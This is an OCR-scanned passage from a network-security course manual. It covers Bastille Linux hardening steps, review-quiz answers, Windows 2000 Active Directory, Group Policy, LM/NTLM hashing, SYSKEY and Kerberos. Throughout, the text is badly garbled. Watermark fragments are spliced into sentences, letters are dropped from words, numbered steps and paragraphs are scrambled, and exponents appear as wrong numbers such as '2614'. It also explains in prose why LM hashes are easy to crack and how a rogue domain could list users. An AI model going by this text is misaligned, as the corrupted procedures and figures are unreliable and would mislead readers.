Copy the three required les to the /bastille directory. The les are: Bastille-2.0.4-1.0.i386.rpm pwlib-1.3.3-5.i386.rpm perl-Tk-800.023-9mdk.i586.rpm
The method by which you will be given these les will be explained by your instructor. In most cases, you will be provided with a CD-ROM or a network-share URL, or the les will already be on your hard drive.
Version numbers used in class may differ from these examples. If that is the case, alter your commands to reect the different version numbers.
In
3.
In a Terminal Window, navigate to the /bastille directory, and enter the following commands, in sequence:
rpm -ivh Bastille-2.0.4-1.0.i386.rpm rpm --nodeps -ivh pwlib-1.3.3-5.i386.rpm rpm --nodeps -ivh perl-Tk-800.023-9mdk.i586.rpm
st
DU
You might get a message saying that pwlib is already installed. If so, continue with the activity.
Again, modify these lines to refer to the correct version numbers if you are using different releases of these RPMs.
PL
TASK 3E-7
IC
AT
It should be obvious that with all that Bastille can control that you should be careful with your conguration choices. Selecting options that you dont fully understand can cause problems with running programs and accessing the machine for legitimate uses. It is for this reason that the Bastille routine should be run but not implementedon your machine in class. Feel free to explore all the options, but do not apply the conguration changes!
Ed
The last way to attempt a reversal of Bastille changes is to go to the backup directory (/root/Bastille/undo/backup); this directory contains copies of the system les that Bastille has altered. You should, with relative ease, be able to replace most of these les, even if it will not be a fast or automated solution.
E
231
iti
on
4. 5.
After the RPMs are nished with their routines, enter bastille into the Terminal Window to start the Bastille program. A disclaimer is displayed. Read the disclaimer, and enter accept to continue with the install. A GUI interface is displayed, where you will answer a series of questions to alter the conguration of your machine. For each question, read the explanation, select the answer that best ts your requirements, and click OK to move to the next question. Dont be concerned if this step takes a little whilethere are a lot of questions and descriptions to read and answer. When you are done with all of the modules, click OK to continue.
6.
7. 8.
When you are prompted, save the conguration. When the Finishing Up window is displayed, click the Exit Without Changing System button.
You do not want to apply some of the possible settings as this may have an adverse effect on your ability to participate in later exercises that use Linux.
Ed
T DU
or
DO NO
In
232
st
ru ct
Lesson Review
The ls command. 500. 0.
In this lesson, you examined the fundamentals of Linux operation. You created les and directories, and congured the security on them. You examined how the system secures passwords by using the shadow password le. You secured access to services, using TCP wrappers and xinetd. You also examined the security of several network services, and the lesson ended with the use of Bastille for nal system hardening.
3A What is the command to view the contents of a directory?
By default, a new user account has a UID of at least what?
What is the default UID for the root account?
PL
Summary
IC
AT
9.
Close all windows.
iti
on
3B What is the octal permission for the setting of rwx?

7. What is the command to change ownership of an object? The chown command. What is the umask value if permissions are set to 000? 777. Are the number of days to a password change stored in the /etc/passwd or the /etc/shadow le? In the /etc/shadow le.
3C What are the two conguration les used by TCP wrappers to control access?
The /etc/hosts.deny and /etc/hosts.allow les.
What is the conguration le that controls xinetd? The /etc/xinetd.conf le.
In xinetd, what line will grant access from the network host 10.20.23.45? only_from 10.20.23.45
Ed
T DU PL IC
/tech 10.20.30.41(rw)
/policy 10.20.30.0/24(ro)
Why must you watch for a space in the conguration lines of an NFS export? The space can change the meaning of the command. For example, a space between the host and permissions can change the permissions to become world-writeable. What is the name of Sambas primary conguration le?
st
Smb.conf.
3E To add a password during system startup, what le do you need to modify?
In
The /etc/lilo.conf le. What is the GUI tool to use to nd services on the system? The Service Conguration tool. What is the GUI tool to use to view the /var/log les? The Log Viewer tool.
DO
ru ct
In NFS, what line will export the /policy directory to the 10.20.30.0/24 network with read-only access?
NO
or
3D In NFS, what line will export the /tech directory to 10.20.30.41 with read and write access?
AT
iti
on
What is the name of the text le that Tripwire reads to create its policy le? The le is named twpol.txt. What is the name of the perl script that will attempt to reverse changes that Bastille has made to a system? The le is named undo.pl.
Ed or ru ct st
In
DO
NO
DU
PL
IC
AT
iti
on
Overview
In this lesson, you will investigate the concepts and procedures required to secure Microsoft Windows computers. You will examine everything from the basic principles of Windows NT security, up to the advanced issues of securing a Windows 2000 machine running Active Directory.
Objectives
In this lesson, you will: 4A
You will describe the local logon process in Windows 2000.
4D
Secure Windows 2000 resources.
4E
Congure Windows 2000 auditing and logging.
st
4F
Examine and congure EFS on Windows 2000.
4G
In
You will examine the components of and implement the Encrypting File System (EFS) on Windows 2000. Examine the methods of securing network communications in a Windows 2000 network. You will examine the systems available to secure network communications in Windows 2000, and you will congure RADIUS and the securing of TCP/IP.
Lesson 4: Hardening Windows Computers
DO
You will congure auditing and logging on a Windows 2000 computer and analyze Security Log Event IDs.
NO
You will examine the security of Windows 2000 resources and congure security settings in the Registry.
DU
You will implement and examine security templates, secedit.exe, and use the Security Conguration and Analysis Snap-in.
ru ct
4C
Implement Windows 2000 security conguration tools.
PL
IC
4B
Examine the fundamentals of authentication in Windows 2000.
or
AT
You will create a custom GPO and edit it to use in the securing of the Windows 2000 infrastructure.
E
235
Examine the concepts of Windows 2000 infrastructure security.
Ed
iti
on
Hardening Windows Computers
LESSON
Data Files NIST2kws.inf Lesson Time 6 hours
Topic 4A
Windows 2000 Infrastructure Security
ru ct st
In
DO
The Windows 2000 domain model governed by AD is a replacement for all the domain models of Windows NT 4.0. In AD, there are no machines designated as Primary or Backup Domain Controllers. Instead, every server that will participate in the management of the domain is simply called a Domain Controller, and contains a master copy of the directory database. (Domain Controllers must be running Windows 2000 Server.)
NO
In a Windows 2000 domain, you have grouped together computers and users who share a central directory database. This directory database contains user accounts, security information, service information, and more, for the entire domain. Access to this directory is based on LDAP. This directory database and its access method together is referred to as Active Directory (AD) and is also referred to as the Windows 2000 directory service (NTDS).
DU
PL
The major step up in the design of a Windows 2000 network came with the new domain model of Windows 2000. The multiple domain models of Windows NT 4.0 are gone. In place is a design where you still group computers together, but they are controlled differently.
or
IC
AT
In Windows 2000, a local security database is a list of user accounts and resource access data, located on each local computer. So, if you had a peer-to-peer network of 20 Windows 2000 computers, you would have 20 local security databases, one for each machine. Although this works, it is inefficient for management, both of resources and of security.
Ed
In Windows 2000, if you install multiple computers in a logical group, and they share resources with one another, you have created a workgroup. The workgroup is commonly referred to as peer-to-peer networking because every machine is an equal, or peer, to the other. In a workgroup, you can have a server; it is simply referred to as a stand-alone server. In this case, there is no controlling security mechanism to the network, and each machine will use its own local security database to control access to resources.
iti
With a completely different approach to managing the network, Windows 2000 has some new components that network administrators must get comfortable with. In this topic, you will take a look into these new components and how they tie into securing both the network itself and resources on the network.
on
For years, Windows NT 4.0 served its market well. It provided a broad platform for business functions and gained widespread use and popularity. However, it was beginning to show its age, and Microsoft needed to move on. What it moved on to was Windows 2000.
A Windows 2000 domain is not bounded by location or network conguration. Machines that are in a domain can be close together on a LANconnected via traditional Ethernetor far apart over a WANconnected via fractional T1, E1, or any other WAN technology. The Active Directory is a database listing of information on each of the objects in the domain. This information includes how each of these objects will interact with other objects in the directory. When you are using Active Directory in Windows 2000, this listing can include information on user accounts, groups, computers, servers, printers, security policies, and more. Active Directory may start out with a small number of objects and grow to hold thousands to millions of object listings.
or
DO NO
In Windows 2000, there are several critical components that make up a successful network implementation of Active Directory. These components are logical in nature and have no boundaries. They are domains, forests, trees, and Organizational Units (OU). The components of AD that are more physical in nature are the domain controllers and sites (IP subnets that identify physical network segments). The functionality of AD separates the physical from the logical network structure.
ru ct
Active Directory Logical Structure
The main component behind the structure of Active Directory is the domain. A Windows 2000 AD domain is comprised of at least, but is not limited to, one domain. Microsoft has termed the objects stored inside a domain as interesting. These interesting objects are dened as those objects which a user needs in the
In
st
One of the benets to Active Directory is the ability to build a logical network that mirrors the logical structure of the organization. Using this logical structure is more intuitive to users, as they are able to nd and identify resources by logical name, without having to have any knowledge of the physical layout of the network.
DU
PL
Active Directory Components
IC
AT
Active Directory objects themselves can be organized into what are known as classes. Classes represent a logical grouping of objects, at the discretion of the administrator. Object class examples include user accounts, computers, domains, groups, and Organizational Units (OUs). You also have the ability to create containers, which can hold other objects. A container is an object that is able to hold computers, users, and/or other objects.
Ed
In addition to the information mentioned earlier, AD holds the information regarding access control. When a user logs on to the network, he or she is authenticated by information that has been stored in the Active Directory. When a user attempts to access an object, the information required to authorize such access is also stored in the Active Directory, and is called the Discretionary Access Control List (DACL).
E
237
iti
Another critical component of Windows 2000 is DNS. The reason this is critical is the dependence of AD on DNS. Active Directory relies on DNS to provide the naming information required to locate resources on the network.
on
WAN: (Wide Area Network) A physical or logical network that provides capabilities for a number of independent devices to communicate with each other over a common transmission-interconnected topology in geographic areas larger than those served by local area networks.
course of doing his or her job function. Examples of interesting objects include printers, databases, email addresses, other users, and more. Each domain holds information about all of the objects in the domain, and only those objects that belong to the domain. Domains are allowed to span one or more physical locations.
Logical Layout of a Windows 2000 Active Directory Network
Ed or
DO NO
ru ct
The domain itself is used as a boundary by which security controls can be in place. The Access Control List (ACL) is used to regulate specic access to domain objects, such as shared folders, for dened users. The ACL contains the permissions that are used to grant or deny access for an object, such as a user or group, to another object, such as a le, folder, or printer. Within a domain itself you can have Organizational Units, or OUs. An OU is a logical holder that is used to further mirror the logical structure of the organization. An OU can contain users, groups, shared folders and printers, and even other OUs from the same domain. Every domain in the network can have a unique OU congurationthere is no dependency on other domains. Security policies and policies concerning computer and user behavior (Group Policies) can be assigned to a stand-alone computer, a site, a domain, or an OU, as appropriate. It is possible to assign policies to each OU, but it is not required that you do so. If there is a policy that you want all of the OUs in the network to use, you can assign it to the parent OU or to the domain, because the default behavior is to allow child objects to inherit policies from their parents within the
In
st
DU
PL
Figure 4-1: A graphical example of the logical network layout of a Windows 2000 Active Directory network.
IC
AT
iti
on
Active Directory. Another important item to note is that these Group Policies are themselves objects in AD; therefore, permissions can be assigned to them. For a policy to take effect upon an object, that object should have at least the Read and Apply Group Policy permissions for that policy.
Possible OU Contents
Figure 4-2: A logical view of the objects an OU can contain.
or
DO NO
IC PL
AT
Domain Trees Use DNS Naming
Another new concept in Windows 2000 is that of forests and trees. A tree is a logical structure, created by the network design team, of one or more Windows 2000 domains that share a namespace. The domains fall in a hierarchical structure and follow DNS naming standards. As shown in Figure 4-3, child domains of SecurityCertied.Net use the parent names in their naming structure.
Ed
T DU
Figure 4-3: A domain tree for Windows 2000 using DNS naming standards.
In
st
ru ct
E
239
iti
on
Two Domain Trees Linked to Make a Forest
ru ct
Another option for manually creating trusts is to connect two Windows 2000 domains that are far down the trees of different forests. This can help to speed up communication between the two domains. These are known as shortcut trusts. While discussing trust, one interesting thing to note, from a security professionals perspective, is how an attacker can take advantage of trust with only a rogue laptop running a Windows NT 4.0 domain and a network connection to a default installation of a Windows 2000 domain. Such a rogue machine can offer its trust to the Windows 2000 domain and obtain the complete list of users and groups from the Windows 2000 domain without any authentication whatsoever. However, this vulnerability has been addressed in the Microsoft Security Rollup package.
st
240
In
DO
NO
A transitive trust means that if Domain C trusts Domain B, and Domain B trusts Domain A, then Domain C also trusts Domain A.
When older Windows domains are on the network, such as Windows NT 4.0 domains, a specic trust can be created. This is called an explicit one-way trust, and it is nontransitive. This way, a Windows 2000 network, running Active Directory, can have communications with an older Windows NT 4.0 domain.
DU
The implementation of trust in a Windows 2000 Active Directory network is quite different from the Windows NT 4.0 implementation. In Windows 2000, all trusts between domains are, by default, two-way transitive trusts. These trusts, based on Kerberos version 5, are created automatically when a new domain is added to the tree. The domain that started the tree is considered the root domain, and each subsequent domain will form a two-way transitive trust upon joining the tree. It is due to this trust that users and computers from any domain are able to be authenticated at any other domain in the tree or forest. (The authorization is based on setting the appropriate permissions to do so.)
or
PL
IC
AT
Figure 4-4: Two unique domain trees tied together to make a forest.
Ed
iti
on
In the Windows 2000 Active Directory structure, a forest is a collection of one or more independent domain trees. These independent trees are linked together with a trust, which will be dened in a moment. Each tree in the forest maintains its proper DNS naming system, and there is no requirement for any similar namespace from one tree to another. Each domain still functions on its own, but the logical connection of the forest enables enterprise-wide communication on the network. The new Windows Server 2003 (.NET) architecture will take this one step furthertrusts can be implemented between forests to create a Federation. Figure 4-4 shows a forest of two trees.
Active Directory Physical Structure

Although the majority of the design and implementation of the Active Directory network is on the logical side, the physical side must also be addressed. The main components of the physical side of Active Directory are sites, the links between the sites, and the Domain Controllers. The site, as dened by Microsoft, is a combination of one or more Internet Protocol (IP) subnets connected by a highly reliable and fast link to localize as much network traffic as possible. A fast link is generally referred to when the connection speed is at least 512 Kbps. In other words, the site is designed to mirror the physical structure of your network and may or may not be made up of different IP subnets. Remember that the domain is designed to mirror the logical needs of the network and apply that same logic to designing a network using physical aspects. There is no correlation between the site and the domain. It is possible to have multiple domains in a site, and it is possible to have multiple sites for one domain.
or
DO NO
Each DC replicates critical changes to all the other DCs immediately. Each DC is able to authenticate user logon requests.
Windows 2000 DNS
A new feature of Windows 2000 is Dynamic DNS (DDNS). DDNS enables clients that receive their IP addresses automatically (via a DHCP server) to have their names and IP addresses registered with the network. With a DDNS server running in the network, the client machines will automatically communicate with the server, announcing their name and address combinations, and will update DNS information with no user intervention required.
In
st
In order for the Active Directory to function in any capacity, DNS must be running for the network. The implementation of the DNS namespace will be the foundation on which the AD namespace is built. By following this procedure, you are able to have uid IP communication, using names that users are familiar with across the network and on the Internet.
T
DU
Each DC replicates changes, at admin-dened intervals, to all the other DCs to ensure a consistent view of the network.
ru ct
PL
The other component of the physical makeup of Active Directory is the actual Domain Controllers (DCs) themselves. These machines, which must be running Windows 2000 Server, each have an exact replica of the Domain Directory. In fact, when making a change on a DC that has an effect on the Active Directory, all other DCs will receive this replicated change. Because any domain controller can authenticate a user to the network, each controller is required to have this Directory. The basic breakdown of the Domain Controller in terms of what it provides to the network is: Each DC stores a copy of Active Directory information that is relevant to that domain (also referred to as an AD partition).
Ed
IC
A site is also not part of the DNS namespace. This means that when browsing the directory, you will see user and computer accounts managed by domain and/or OU, but not by site. The only thing a site contains is Computer objects and objects relevant to the connection and replication from one site to another.
AT
E
241
iti
on
One of the advantages to running DDNS in a network is the ability to eliminate other protocols and services that might be running in order to locate resources. For example, the Windows Internet Name Service (WINS) of Windows NT 4.0 is no longer required, and the use of NetBEUI as a communication protocol is no longer required, but might be needed to provide backward compatibility.
Group Policy Components
Having the policy affect all computers may not be your desired result, so you do have the ability to lter how the policy will be implemented for computers and users. The ltering will use Access Control Lists (ACLs), as designed by you. Some of the rules for applying a GPO are as follows: A GPO can be associated with more than one domain. A GPO can be associated with more than one OU. A domain can be associated with more than one GPO.
Ed
T DU
When you congure group policy settings, they are placed in what is called a Group Policy Object, or GPO. The GPO is then responsible for controlling the application of the policy to Active Directory objects, such as sites, OUs, and domains. Once a GPO is congured, it is applied to the AD object as assigned, and by default, the policy will affect all computers that are in the AD object.
st
242
In
The User Conguration node provides the option to manage behavior that is unique to the user, such as Desktop settings, Control Panel settings, Start menu settings, and more.
DO
ru ct
Group Policy Implementation
In the Group Policy Editor, you are presented with two parent objects to manage, User Conguration and Computer Conguration. This is where you will create the GPOs that you will later apply as per your requirements. The Computer Conguration node provides the option to manage the behavior of the operating system, account policies, IP security policies, and more.
NO
To start with the conguration of a GPO, you must open and use the Group Policy Editor. As with most of the management options in Windows 2000, this can be opened via the Microsoft Management Console (MMC).
PL
As you can see, you are allowed a lot of exibility in GPO implementation. However, before getting too far into the implementation, you must take a step back and look into the GPO itself in more detail.
IC
An OU can be associated with more than one GPO.
or
AT
iti
The nal component of the Windows 2000 infrastructure we are going to discuss is the group policy. A group policy is a logical grouping of user and computer settings that can be applied to computers, domains, OUs, and sites. For example, you can congure a group policy setting to remove objects from the Start menu.
on
TASK 4A-1
Configuring a Custom MMC and GPO
1. 2. 3. 4. 5. 6. 7. Boot your computer to Windows 2000, and log on as Administrator. From the Start menu, choose Run and enter mmc into the Run dialog box to start the default Microsoft Management Console. Choose ConsoleAdd/Remove Snap-In. Click the Add button. Scroll down in the list, select Group Policy, and click Add. You will be asked to select the location for the Group Policy Object. Leave the GPO selection of storing on the local computer, and click Finish.
Click Close, and then click OK to close the Add/Remove Snap-in window.
Ed
T DU PL IC
8.
Choose ConsoleSave, and save this console as Custom_GPO. The new Console object you created will now be available in your Administrative Tools and can be accessed through the Start menu. You might also want to create a shortcut to it on the Windows Desktop.
Editing GPOs
In
Once you have created GPOs, you can edit and further customize them. Bear in mind that GPOs themselves are AD objects. Therefore, you can make copies of GPOs, not actually apply them but save them to a le, and email them to another administrator in your company and have him tweak it further for the task at hand. In the following task, you will edit your GPO to control password settings in the domain.
st
DO
ru ct
NO
or
AT
E
243
iti
on
TASK 4A-2
Editing a GPO
1. 2. 3. 4. 5. 6. 7. 8. 9.
Expand Local Computer Policy.
If necessary, expand Computer Conguration. Expand Windows Settings. Expand Security Settings.
Expand Account Policies, select Password Policy, and double-click the Enforce Password History option. For the number of passwords to remember, enter 5 and click OK. Right-click the Maximum Password Age option and choose Security. For the maximum age of passwords, enter 30 days and click OK.
ru ct
Enforcing GPOs
st
244
In
DO
NO
Once you create and edit a GPO, it must be enforced to have any effect on the network. As discussed, there can be GPOs on sites, domains, and OUs, so being aware of the order of implementation is critical to proper GPO deployment. 1. The rst GPO that is processed is the local GPO. Every Windows 2000 computer has a GPO stored locally. Although this is the rst GPO processed,
DU
PL
11. Close the Custom_GPO without saving settings, and then reopen it. Verify that the local and effective settings match.
IC
10. Observe the console. The Local Settings you just adjusted are different than the currently effective (default) settings. However, if you close and reopen the GPO, the altered settings will become the effective settings.
or
AT
If you are prompted to change related values, click OK to reset the Minimum Password Age.
Ed
iti
on
Setup: You are logged on to Windows 2000 as Administrator, and the Custom_GPO console is running.
it is not practical to implement custom congurations on each machine on the network, so often administrators move right past the local GPO. 2. After the local GPO is processed, the site GPO is implemented. Because there can be multiple GPOs for one site, it is up to the administrator to dene the order of implementation, which is done in the Site Properties.
4.
or
NO DO
1.
In
At the domain level, the Congure Toolbar Buttons policy is to be Enabled, the Show Back Button option is unchecked, and the Show Stop Button option is checked. At the OU level, the Congure Toolbar Buttons policy is to be Enabled, the Show Search Button and Show History Button options are checked.
The user will see the Home, Stop, Search, and History buttons.
st
You have been assigned to dene Internet Explorer settings for users in your enterprise, and you decide to experiment with dening GPOs at various levels. If you dene the following GPOs, what will the nal result be when a user in this OU logs on and runs IE? At the site level, the Congure Toolbar Buttons policy is to be Enabled, and the Show Back Button and Show Home Button options are checked.
Objective: To examine the impact of implementing GPOs at different levels and to determine the nal policy settings that will be in effect.
DU
Implementing Multiple GPOs
ru ct
PL
If students are interested and time permits, you might want to demonstrate the GPO implementation shown here so that students can see the resulting policy settings. If so, you will need to run dcpromo to install Active Directory.
TASK 4A-3
IC
AT
Knowledge of the implementation order of the GPOs is critical for anyone who works to secure and manage a Windows 2000 network. By looking at the implementation order, you can identify that if a site GPO was dened to disable the Restrict CD-ROM Access To Locally Logged-on User Only, and the domain GPO was to dene that same setting as Enabled, then the settings for computers belonging to that site and domain would be enabled, as the domain GPO was processed after the site GPO.
Ed
In each location (site, domain, or OU) where there can be more than one GPO, the place to modify the GPO order is in the Properties of the location. For example, in the Site Properties, when multiple GPOs are listed, the option to move them Up or Down is present. The system will process the GPOs highest on the list as having the highest priority, taking precedence over GPOs that are lower on the list.
E
245
iti
The nal GPO to be processed is the OU GPO. Again, as in the other implementations, more than one GPO may be present for the OU, and, as such, the administrator is required to properly plan and implement the GPOs as desired.
on
3.
Once the site GPO has been processed, the domain GPO is implemented. Just as there can be multiple GPOs for a site, there can be multiple GPOs for a domain, so the administrator must take care to dene the order of implementation here as well.
Topic 4B
Windows 2000 Authentication
SSL: (Secure Sockets Layer) A session layer protocol that provides authentication and condentiality to applications.
Although the SSPI plays an important function in the authentication of users, it is not something that administrators spend time with, as there are no options for conguration or management involved in the SSPI. It simply sits and performs its job of connecting authentication requests to the authentication provided by the system. Where the authentication process starts to involve the administrators more is in the security architecture of Windows 2000. The security architecture of Windows 2000 is comprised of parts of both the operating system and Active Directory. For example, account information and policy settings are stored in AD, while the OS holds the security process that is implemented and information regarding trusts to and from other areas of the network.
Ed
T DU
Windows 2000 uses what is called the Security Support Provider Interface (SSPI) to allow for these methods of authentication. The SSPI functions between the user applications, such as the Web browser, and the authentication method, such as NTLM or Kerberos. This means that an application developer need not create an application for each type of authentication, but rather can create one application that can communicate with SSPI.
st
In earlier OSsbefore Windows NT 4.0, with Service Pack 4 (SP4)there were only two supported methods of what is called challenge/response authentication. Those two methods were LAN Manager (LM) and Windows NT LanMan (NTLM). Windows 2000 has increased the security by adding NTLMv2.
246
In
DO
ru ct
security architecture: A detailed description of all aspects of the system that relate to security, along with a set of principles to guide the design. A security architecture describes how the system is put together to satisfy the security requirements.
or
NO
If you have installed a new Windows 2000 domain, it is in what is called mixed mode. In a mixed-mode network, there can be both Windows NT 4.0 BDCs and Windows 2000 domain controllers present. This allows for maximum communication options over the network, but does not present the most secure environment, because you must support authentication options for two systems.
Authentication Methods
PL
If you have installed a new Windows 2000 domain, and all machines are running Windows 2000, the default method of authentication is Kerberos. You can, of course, change the authentication method, but the default will be Kerberos.
IC
AT
iti
on
Despite all the advancements and new components of Windows 2000, one thing remains the same: a user must be authenticated to access resources on the network. Where Windows 2000 starts to look new in comparison with earlier versions is with the methods of authentication that it can use. Windows 2000 can use any of the following for authentication: Kerberos, NTLM, NTLMv2, LM, RADIUS, SSL, Smart Cards, and more.
LM Authentication
In order to provide maximum compatibility, the ability to communicate with older systems is a requirement. If the older systems are using LAN Manager authentication, this can introduce a vulnerability to the network.
Ed
T DU PL IC
The computer will take the 14-character, all-upper-case password and split it into two 7-character chunks. Each character space is one byte, so in essence there are now two 7-byte values. Each 7-byte value is used as the key for DES to encrypt a 64-bit constant value. The output of the encryption on both sides creates a unique value. These two values are then listed next to one another to provide the nal hash value. Figure 4-5 shows this process.
st
Figure 4-5: The generation of an LM hash.
In
DO
ru ct
NO
or
AT
iti
In the Windows systems, passwords are not stored or visible anywhere in their plaintext versions, for good reason. Instead, they are stored as hashes, or one-way encrypted character sets that represent the passwords. The way that an LM hash is created also presents a potential weakness. The LM password can be a maximum of 14 characters.
on
LM authentication uses a password that is based on the standard character set. This means that no special characters can be included in passwords, which is an obvious weakness. Additionally, the passwords are not case-sensitive. A password can be typed in upper- and lower-case letters, but the system will always convert the letters to all upper caseagain an obvious weakness.
vulnerability: Hardware, rmware, or software ow that leaves an AIS open for potential exploitation. A weakness in automated system security procedures, administrative controls, physical layout, internal controls, and so forth, that could be exploited by a threat to gain unauthorized access to an AIS.
The Generation of an LM Hash
247
Once the hash value has been calculated, you can look at it and see a long string of characters, thinking it looks secure. But, the weaknesses of LM hashing becomes quickly apparent. The rst issue is the character set. Because only standard characters can be used, the character set is limited to 26 letters and 14 characters, or a full password space that is 2614, or approximately 1019. This is a string of 65 bits that would need to be cracked. However, the second issue of the split in the password comes quickly into play. In the previous example, the password was split into two chunks, MYPASSW and ORDISLO. These two chunks can be attacked at the same time. So, the password space is actually 267+267, or approximately 1010. This is now a full string of only 32 bits to crack, and each half can be cracked at the same time, reducing the bit space further. The second half of the password will generally be attacked rst. This is due to the fact that most people do not use a password that is a full 14 characters. So, in cracking this half, there may be fewer calculations to make. Secondarily, the characters that are cracked can reveal clues as to the rst half of the password.
When Microsoft was developing Windows NT, an opportunity was made to improve on the weaknesses of LM authentication. The result was the Windows NT LAN Manager (NTLM) Authentication method. A primary enhancement that NTLM offered over LM was that the character set could now include the full Unicode set. This allowed for characters outside of letters and allowed for upper- and lower-case letters. This was a signicant improvement. The password was now seen to the system as 14 16-bit Unicode characters. The 14 characters were then converted into a 128-bit hash value by using Message Digest #4 (MD4), developed by Ron Rivest. This is what is commonly referred to as the NTLM hash. Figure 4-6 shows the generation of an NTLM hash.
Ed
T DU
NTLM Authentication
or
DO NO
The Generation of an NTLM Hash
In
248
st
ru ct
Figure 4-6: The generation of an NTLM hash. Although having a full 128-bit character space to attack provides better protection against attacks, there is an issue with the implementation of the new NTLM in Windows. In order for Windows to remain backward-compatible, it was decided to provide an equivalent LM hash. This would allow newer Windows computers to communicate with older systems.
PL
IC
AT
iti
on
Because Windows stores the NTLM and LM values for each user, an attacker will work on cracking the LM hash rst. Once that is recovered, the attacker can run a simple brute-force test to determine the case-sensitivity of the letters found. The NTLM and LM values are found stored in the Windows Registry in the SAM.
The addition of the controls on the backward-compatible features of LM is a signicant improvement to the security of the network. Figure 4-7 shows where the settings of the authentication options are made.
Ed or
Figure 4-7: Local Security Policy options for authentication.
ru ct
st
Windows stores both the LM and NTLM hashes in the Registry. This is yet another reason for proper security controls on Registry access. However, if the SAM can be pulled off the computer, from a Recovery Disk, or if the SAM can be dumped from the Registry using software, extra security is required. Microsoft introduced a means of securing the SAM called System Key, or SYSKEY for short. SYSKEY uses a secret 128-bit key to provide encryption on the SAM database, making it more difficult to pull the hashes off a disk and crack them. SYSKEY needed to be added to a Windows NT system and is included in Windows 2000 by default.
In
DO
NO
SYSKEY
DU
PL
IC
AT
E
249
iti
NTLMv2 was introduced in the continuing line of evolving authentication. NTLMv2 allows for control over the use of traditional LM by the client and the server. Additionally, NTLMv2 uses MD5 to create the hash. The 128-bit NTLMv2 also provides session condentiality and integrity. In the event that NTLMv2 is used where the United States Export Restrictions are not met, it will be installed in 56-bit mode.
on
NTLMv2
Allow the computer to generate a random key and store the key on a oppy disk. The system will prompt for the disk during startup. Create a password and remember the password. Enter the System Key when prompted during the startup sequence.
The Challenge and Response
2. 3.
The server sends a random string of characters to the client. This is called the challenge.
Ed
T DU
All of the previous authentication methods discussed so farLM, NTLM, and NTLMv2use what is called the Challenge Response authentication. Without assigning specic numbers to the sequence of events, the following steps dene the general process of the challenge response system: 1. The client initiates the authentication process by bringing up the logon screen and requesting to logon.
4.
st
2.
250
In
GINA hands off the entered information to the Local Security Authority (LSA) for authentication. The LSA is what creates the access tokens, pro-
DO
ru ct
Windows 2000 Local Logon Process

There are two methods used when you log on to a Windows 2000 Server or Professional computer locally. The two authentication methods are Kerberos and NTLM. Kerberos is the main method, and in the event that Windows cannot nd a KDC (Key Distribution Center), then Windows will revert to NTLM for authentication to the local machine, using the local SAM (Security Accounts Manager) database. The process of logging on to the local system, using NTLM is: 1. A user enters his or her user name and password. These credentials are collected by the Graphical Identication and Authentication (GINA) component of Windows.
NO
PL
IC
The server encrypts the challenge using the stored hash of the users password. If the servers value matches the clients value, the user is authenticated.
or
AT
The client enters a username and password. The hash of the users password encrypts the challenge characters and returns the encrypted value. This is called the response.
iti
on
A common question is: Where do I store, or what do I do with the SYSKEY value itself? The key must be available and must be protected. There are three options for managing SYSKEY on a system: Allow the computer to generate a random key as the System Key and store the key somewhere in the Registry. The key will then be used when the system restarts, and input from the user who started the system is not required.
vides an interactive environment for user authentication, controls the local security policy, and sends authentication requests to NTLM or Kerberos, as required. 3. LSA will then hand off the information to the SSPI, which will give the authentication request to the NT LAN Manager (NTLM) driver, called MSV1-0 SSP. (At this stage, if Kerberos is being used, SSPI would hand off to Kerberos.) The NTLM driver uses the Netlogon service to authenticate the user credentials with the local SAM database.
4.
or
DO NO
ru ct
Once the user account has been authenticated, the TGT is used to request further Kerberos tickets in order to access network services. The machine that provides the tickets for the network resources to the authenticated client is called a Ticket Granting Server (TGS).
In
The Ticket Granting Server (TGS) is what creates the actual tickets for the client to use in accessing authorized resources. In a Windows 2000 implementation, this is congured as a service called the Ticket Granting Service. The Kerberos Distribution Center (KDC) in a Windows 2000 implementation contains both the Authentication Service and the Ticket Granting Service.
st
To summarize: An Authentication Server (AS) is used to perform the actual authentication of the Kerberos client. In a Windows 2000 implementation, this is congured as a service called the Authentication Service.
DU
When a user begins the logon process by entering their credentials (a username and password, a smart card, or biometrics), Windows contacts an Active Directory domain controller and locates the Kerberos Key Distribution Center (KDC). [An Authentication Server (AS) is what performs the actual authentication.] The KDC responds by issuing a Ticket Granting Ticket (TGT) to the authenticated user. The TGT contains identication information about this user to various servers on the network and is used to gain further access in the network.
PL
IC
Although it is beyond the scope of this course to get into the details of Kerberos operation, you should be familiar with the fundamental issues of its function for authentication purposes.
AT
E
251
Kerberos is an IETF standard used for authentication. It was developed by the Massachusetts Institute of Technology during the 1980s. As an authentication method, it is considered to be a secure method and has been implemented in OSs before the Windows 2000 implementation. There is a bit of controversy in the method used in Windows systems, as it varies slightly from the standard created by MIT. However, it should be noted that Windows 2000 is able to interoperate with nonWindows 2000 machines running Kerberos.
Ed
If you have a Windows 2000 domain up and running, and you want to implement Kerberos, all you have to do isnothing! Kerberos will be used by default to authenticate network clients (who must be running Windows 2000) logging onto a Windows 2000 domain.
iti
Kerberos in Windows 2000
on
Smart Cards in Windows 2000
Ed
T DU
Smart Cards in Windows 2000 utilize Kerberos and public key cryptography. Public key cryptography is asymmetrical cryptography, meaning that there is one key for encryption and a different key for decryption. When grouped together, the two are called the private/public key pair, or simply the key pair. The private key is known only to the owner and is never shared with the world. The public key is known to the world; it is publicly available. When Smart Cards are deployed in place of a password, the key pair is stored on the card.
Configuring NTLMv2 Authentication
or
DO NO
252
In
st
ru ct
1. 2. 3. 4.
Under Security Settings, expand Local Policies, and select Security Options. Double-click LAN Manager Authentication Level. In the Local Policy Setting drop-down list, select Send NTLMv2 Response Only, and click OK. Close the Custom_GPO, saving settings if you are prompted to do so. If you have authentication issues in later tasks, you can return the setting to Send LM And NTLM Responses.
PL
Setup: You are logged on to Windows 2000 as Administrator, and the Custom_GPO is open.
IC
AT
TASK 4B-1
iti
With the release of Windows 2000, Microsoft included built-in support for Smart Cards. Smart Cards allow for a physical component of authentication, which provides an additional layer of defense for the system.
on
One of the benets to end-users of a network running Kerberos is that a Single Sign On (SSO) can be maintained. With SSO, users are not required to authenticate with each network resource they want to access, and because Windows 2000 trusts are transitive, once a user logs on to one domain he or she will have access to the other domains in the forest. Another key benet of Kerberos is that it has a mechanism for verifying the identity of the user, not just authentication. This means that in a Kerberos network, if a message says it came from User A, you can be very condent it did indeed come from User A.
Topic 4C
Windows 2000 Security Configuration Tools
The Gold Standard
Ed
T DU PL IC
User and Group Security
There are two basic types of user accounts that can be created in Windows 2000: domain users and local users. A domain user account has the ability to log on to the network and access authorized resources throughout the domain.
st
